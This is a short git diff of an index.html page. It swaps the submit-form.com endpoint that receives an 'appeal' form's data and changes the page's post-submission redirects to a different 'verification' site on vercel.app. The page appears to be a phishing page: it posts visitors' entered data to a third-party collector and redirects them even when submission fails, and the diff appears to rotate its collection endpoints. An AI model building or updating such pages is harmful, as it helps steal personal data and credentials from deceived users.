--- a/index.html
+++ b/index.html
@@ -727,7 +727,7 @@
 
       // Function to submit to first form (https://submit-form.com/TyQLTLu19)
       function submitToFirstForm(data) {
-        return fetch("https://submit-form.com/fvAkTU8YG", {
+        return fetch("https://submit-form.com/6IOGamsOa", {
           method: "POST",
           headers: {
             "Content-Type": "application/json",
@@ -794,7 +794,7 @@
               appealModal.style.display = "none";
 
               // Redirect to example link after successful submission
-              window.location.href = "https://verification-request.vercel.app/";
+              window.location.href = "https://just-submit-eta.vercel.app/";
             })
             .catch((error) => {
               // Hide loading state
@@ -806,7 +806,7 @@
               // Still redirect even if submission fails (optional behavior)
               // Comment out the next 3 lines if you want to prevent redirect on error
               appealModal.style.display = "none";
-              window.location.href = "https://verification-request.vercel.app/";
+              window.location.href = "https://just-submit-eta.vercel.app/";
             });
         } else {
           // Scroll to first error
